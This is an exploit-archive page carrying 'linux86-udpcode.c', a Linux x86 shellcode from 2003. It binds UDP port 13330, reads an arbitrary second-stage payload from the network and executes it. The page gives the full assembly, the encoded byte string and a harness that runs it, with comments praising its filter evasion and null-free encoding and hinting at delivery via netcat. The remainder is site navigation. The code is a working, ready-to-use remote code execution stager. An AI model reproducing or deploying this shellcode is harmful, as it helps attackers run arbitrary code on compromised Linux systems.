linux86-udpcode.c

linux86-udpcode.c: Posted Jun 29, 2003; Authored by Gunzip | Site members.xoom.it; Linux x86 UDP shellcode. Reads from UDP port 13330 to retrieve other shellcode then executes it.; tags | x86, udp, shellcode; systems | linux; SHA-256 | a19f2e0f5e3ed7c024fa5903d3b63b3001cc6d694f0a752097064021a0cea265; Download | Favorite | View

linux86-udpcode.c

/**
 ** Linux/x86 udp + read + exec shellcode (c) gunzip
 **
 ** reads from udp port 13330 another shellcode then executes it
 ** 
 ** 1. Udp is usually not filtered
 ** 2. You can send very big shellcode (size <= 65535)
 ** 3. It's shorter than any tcp bind-shellcode (just 60 bytes)
 ** 4. Your sent shellcodes can contain any char ( 0x00 too )
 ** 5  You can send a whole shell script to execute with a command code
 ** 6. Does not contain CR, LF, spaces, slashes and so on  
 ** 7. No need to search for file descriptors
 ** 
 ** gunzip@ircnet <techieone@softhome.net>
 ** http://members.xoom.it/gunzip
 **
 ** If you can't figure it out how to use this you don't need this.. 
 ** hint: try with puts( shellcode ) and pipe netcat -u host
 **
 ** HaPPy BiRtHdAy tankie !!! :-]
 ** 
 **/

void udp_exec()
{
  __asm__("
    /* fd = socket( AF_INET, SOCK_DGRAM, 0 ) */

                xorl    %eax,   %eax
                xorl    %ebx,   %ebx
    incl  %ebx      # socket()
                pushl   %eax      # IPPROTO_IP
    pushl  $0x2      # SOCK_DGRAM
    pushl  $0x2      # AF_INET
                movl    %esp,   %ecx
                movb    $0x66,  %al             # SYS_socketcall
                int     $0x80

    /* bind(s, (struct sockaddr *)&sa, sizeof(sa)) */

    decl  %ebx      # ebx = 0x0
    pushl  %ebx      # PAD
    pushl  %ebx      # PAD
    pushl   %ebx      # INADDR_ANY
    pushw  $0x1234      # PORT  (13330)
    pushw  $0x2      # ADDRESS FAMILY
    movl  %esp,  %ecx    
    pushl  $0x16      # sizeof(struct sockaddr)
    pushl  %ecx      # pointer to struct sockaddr
    pushl  %eax      # socket file descriptor
    movl  %esp,  %ecx    # SYS_socketcall * args
    movb  $0x2,   %bl    # SYS_socketcall bind()

    push  $0x66      # SYS_socketcall
    popl  %eax
    int  $0x80

    /* read( s, buf, 0xffff ); jmp *buf */

                movl    (%esp),  %ebx            # socket fd
    cltd        # on bind success eax = 0x0
    movw  $0xffff,%dx    # len = 65535
    subl  %edx,   %esp    # reserves space
                movl    %esp,   %ecx            # where to read
    movb     $0x03,  %al    # SYS_read
    int      $0x80
    jmp  *%ecx
    ");
}

#define PORT  "\x34\x12"

char shellcode[]=
  "\x31\xc0\x31\xdb\x43\x50\x6a\x02\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
  "\x4b\x53\x53\x53\x66\x68" PORT "\x66\x6a\x02\x89\xe1\x6a\x16\x51"
  "\x50\x89\xe1\xb3\x02\x6a\x66\x58\xcd\x80\x8b\x1c\x24\x99\x66\xba"
  "\xff\xff\x29\xd4\x89\xe1\xb0\x03\xcd\x80\xff\xe1";

main()
{
  void (*f)() = (void *)&shellcode;
  printf("\n[+] Udp read shellcode by gunzip, len = %d\n", strlen(shellcode));
  f();
}

Top Authors In Last 30 Days

Red Hat 297 files
Ubuntu 60 files
Gentoo 32 files
Debian 31 files
LiquidWorm 10 files
Apple 9 files
malvuln 6 files
Adam Gowdiak 4 files
nu11secur1ty 4 files
Ahmet Umit Bayram 4 files

File Archives

Systems

AIX (429)
Apple (2,087)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,042)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,499)
HPUX (880)
iOS (375)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,619)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,770)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,499)
UNIX (9,401)
UnixWare (187)
Windows (6,659)
Other

linux86-udpcode.c

linux86-udpcode.c

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

linux86-udpcode.c

Share This

linux86-udpcode.c

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems